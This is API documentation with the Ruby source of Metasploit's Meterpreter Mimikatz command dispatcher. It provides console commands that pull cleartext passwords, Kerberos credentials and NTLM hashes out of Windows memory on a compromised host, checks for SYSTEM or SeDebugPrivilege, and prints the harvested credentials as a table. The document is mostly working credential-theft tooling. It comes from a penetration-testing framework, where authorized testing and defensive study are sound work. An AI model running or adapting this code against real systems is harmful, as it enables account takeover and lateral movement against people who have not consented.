Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Mimikatz
Overview
Mimikatz extension - grabs credentials (cleartext passwords and hashes) from Windows memory.
Benjamin DELPY `gentilkiwi` - blog.gentilkiwi.com/mimikatz
extension converted by Ben Campbell (Meatballs)
Constant Summary
- Klass =
Console::CommandDispatcher::Mimikatz
- @@command_opts =
Rex::Parser::Arguments.new(
"-f" => [true, "The function to pass to the command."],
"-a" => [true, "The arguments to pass to the command."],
"-h" => [false, "Help menu."]
)
Instance Attribute Summary
#shell, #tab_complete_items
Instance Method Summary
check_hash, #client, #log_error, #msf_loaded?, set_hash
#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #help_to_s, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_filenames, #update_prompt
Constructor Details
#initialize(shell) ⇒ Mimikatz
Initializes an instance of the Mimikatz command dispatcher (the "priv" wording in the source comment is a leftover from the dispatcher this one was derived from).
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 27
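# Initializes the Mimikatz command dispatcher.
#
# After the usual dispatcher setup, compares the bitness of the Meterpreter
# client with that of the target OS and warns on an x86 client sitting on an
# x64 host: an x86 mimikatz presumably cannot read the 64-bit credential
# providers correctly, so the dumps that follow may come back empty or fail
# — confirm against the extension's behaviour. The warning is informational
# only; nothing is blocked.
#
# @param shell [Object] the console shell this dispatcher is attached to
def initialize(shell)
  super
  x86_client = client.platform =~ /x86/
  x64_target = client.sys.config.sysinfo['Architecture'] =~ /x64/
  # `&&` instead of `and`: same truth table here, but avoids the
  # low-precedence trap of the keyword form.
  if x86_client && x64_target
    print_line
    print_warning "Loaded x86 Mimikatz on an x64 architecture."
  end
end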
Instance Method Details
#cmd_kerberos(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 142
# Console command: dump credentials held by the kerberos provider.
#
# Any arguments are accepted for signature compatibility but ignored; the
# actual work (privilege check, extension call, table output) is done by
# mimikatz_request, which is handed a callable that issues the request.
#
# @param args [Array<String>] ignored
def cmd_kerberos(*args)
  fetch = -> { client.mimikatz.kerberos }
  mimikatz_request("kerberos", fetch)
end
#cmd_livessp(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 127
# Console command: dump credentials held by the livessp provider.
#
# Any arguments are accepted for signature compatibility but ignored; the
# actual work (privilege check, extension call, table output) is done by
# mimikatz_request, which is handed a callable that issues the request.
#
# @param args [Array<String>] ignored
def cmd_livessp(*args)
  fetch = -> { client.mimikatz.livessp }
  mimikatz_request("livessp", fetch)
end
#cmd_mimikatz_command(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 56
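# Runs an arbitrary mimikatz function on the target.
#
# Usage: `mimikatz_command -f <function> -a "<args>"`. With no arguments the
# help text is printed instead. The function name and its arguments are
# forwarded verbatim to the remote extension via send_custom_command — there
# is no validation here, since both come from the operator at the console.
# Two practical caveats:
#   * `-a` is split on whitespace, so quoting is not honoured: an argument
#     that itself contains spaces cannot be passed through this command.
#   * The raw response is printed straight to the console, so whatever
#     mimikatz returns (credential material included) ends up in the console
#     output and in any console log/spool the operator has enabled.
#
# @param args [Array<String>] raw console arguments
# @return [true] on the help path and when -f is missing (after print_error);
#   otherwise the return value of print_line
def cmd_mimikatz_command(*args)
  args = ["-h"] if args.empty?
  cmd_func = nil
  cmd_args = nil
  @@command_opts.parse(args) do |opt, _idx, val|
    case opt
    when "-a"
      cmd_func = cmd_func # no-op placeholder avoided below; see -f
      cmd_args = val
    when "-f"
      cmd_func = val
    when "-h"
      print(
        "Usage: mimikatz_command -f func -a args\n\n" \
        "Executes a mimikatz command on the remote machine.\n" \
        "e.g. mimikatz_command -f sekurlsa::wdigest -a \"full\"\n" +
        @@command_opts.usage)
      return true
    end
  end
  unless cmd_func
    print_error("You must specify a function with -f")
    return true
  end
  # String#split(" ") is awk-style: leading whitespace dropped, runs of
  # whitespace treated as one separator.
  arguments = cmd_args ? cmd_args.split(" ") : []
  print_line client.mimikatz.send_custom_command(cmd_func, arguments)
end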
#cmd_msv(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 122
# Console command: dump credentials (hashes) held by the msv provider.
#
# Any arguments are accepted for signature compatibility but ignored; the
# actual work (privilege check, extension call, table output) is done by
# mimikatz_request, which is handed a callable that issues the request.
#
# @param args [Array<String>] ignored
def cmd_msv(*args)
  fetch = -> { client.mimikatz.msv }
  mimikatz_request("msv", fetch)
end
#cmd_ssp(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 132
# Console command: dump credentials held by the ssp provider.
#
# Any arguments are accepted for signature compatibility but ignored; the
# actual work (privilege check, extension call, table output) is done by
# mimikatz_request, which is handed a callable that issues the request.
#
# @param args [Array<String>] ignored
def cmd_ssp(*args)
  fetch = -> { client.mimikatz.ssp }
  mimikatz_request("ssp", fetch)
end
#cmd_tspkg(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 137
# Console command: dump credentials held by the tspkg provider.
#
# Any arguments are accepted for signature compatibility but ignored; the
# actual work (privilege check, extension call, table output) is done by
# mimikatz_request, which is handed a callable that issues the request.
#
# @param args [Array<String>] ignored
def cmd_tspkg(*args)
  fetch = -> { client.mimikatz.tspkg }
  mimikatz_request("tspkg", fetch)
end
#cmd_wdigest(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 117
# Console command: dump credentials held by the wdigest provider.
#
# Any arguments are accepted for signature compatibility but ignored; the
# actual work (privilege check, extension call, table output) is done by
# mimikatz_request, which is handed a callable that issues the request.
#
# @param args [Array<String>] ignored
def cmd_wdigest(*args)
  fetch = -> { client.mimikatz.wdigest }
  mimikatz_request("wdigest", fetch)
end
#commands ⇒ Object
List of supported commands.
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 38
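# Console commands provided by this dispatcher, mapped to their help text.
#
# Every entry except mimikatz_command is a shortcut that dumps one mimikatz
# credential provider (see the matching cmd_* method); mimikatz_command
# forwards an arbitrary function name and argument string to the extension.
# The only change from the previous version is the spelling of "command" in
# the first description, which is user-visible help text.
#
# @return [Hash{String => String}] command name => one-line description
def commands
  {
    "mimikatz_command" => "Run a custom command",
    "wdigest"          => "Attempt to retrieve wdigest creds",
    "msv"              => "Attempt to retrieve msv creds (hashes)",
    "livessp"          => "Attempt to retrieve livessp creds",
    "ssp"              => "Attempt to retrieve ssp creds",
    "tspkg"            => "Attempt to retrieve tspkg creds",
    "kerberos"         => "Attempt to retrieve kerberos creds"
  }
end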
#get_privs ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 147
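# Reports whether the session looks privileged enough for a credential dump.
#
# Running as SYSTEM (per system_check) is treated as sufficient outright.
# Otherwise getprivs is invoked on the session and its result is checked for
# SeDebugPrivilege — presumably because that is what lets a non-SYSTEM
# process open LSASS; confirm against the extension. Note this only prints
# status: the callers in this file carry on and issue the request regardless,
# so a missing privilege surfaces as an empty or failed dump rather than an
# early abort.
#
# Rewritten from `unless … else` to a plain `if … else` for readability; the
# messages and the order of the checks are unchanged.
def get_privs
  if system_check
    print_good("Running as SYSTEM")
  else
    print_status("Attempting to getprivs")
    privs = client.sys.config.getprivs
    if privs.include?("SeDebugPrivilege")
      print_good("Got SeDebugPrivilege")
    else
      print_warning("Did not get SeDebugPrivilege")
    end
  end
end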
#mimikatz_request(provider, method) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 93
# Shared driver for the per-provider cmd_* commands.
#
# Runs the privilege check (get_privs, which only warns), invokes `method` to
# fetch the credential records, and renders them as a table with columns
# AuthID / Package / Domain / User / Password, sorted on column 4 — i.e. the
# Password column. Newlines are stripped from each password so a multi-line
# value cannot break the table layout; other control characters are left as
# returned. Everything, cleartext passwords included, is printed to the
# console, so it also lands in any console log/spool that is enabled.
#
# @param provider [String] provider name used in status text and the header
# @param method [#call] callable returning an array of hashes with keys
#   :authid, :package, :domain, :user and :password (password may be nil)
# @return [true]
def mimikatz_request(provider, method)
  get_privs
  print_status("Retrieving #{provider} credentials")
  creds = method.call
  table = Rex::Ui::Text::Table.new(
    'Header'    => "#{provider} credentials",
    'Indent'    => 0,
    'SortIndex' => 4,
    'Columns'   => ['AuthID', 'Package', 'Domain', 'User', 'Password']
  )
  creds.each do |cred|
    secret = cred[:password] || ""
    table << [cred[:authid], cred[:package], cred[:domain], cred[:user], secret.gsub("\n", "")]
  end
  print_line table.to_s
  true
end
#name ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 173
# Human-readable name of this dispatcher, as shown by the console.
#
# @return [String] "Mimikatz"
def name
  'Mimikatz'
end
#system_check ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 161
# Tells whether the session is running as the local SYSTEM account.
#
# This is an exact string comparison against what getuid reports, so it only
# recognises the English spelling "NT AUTHORITY\SYSTEM"; on a host where
# getuid presumably returns a localised account name this yields a false
# negative — harmless here, since get_privs then merely attempts getprivs
# and warns. A warning is printed on the negative path.
#
# @return [Boolean] true when getuid equals "NT AUTHORITY\\SYSTEM"
def system_check
  return true if client.sys.config.getuid == "NT AUTHORITY\\SYSTEM"

  print_warning("Not currently running as SYSTEM")
  false
end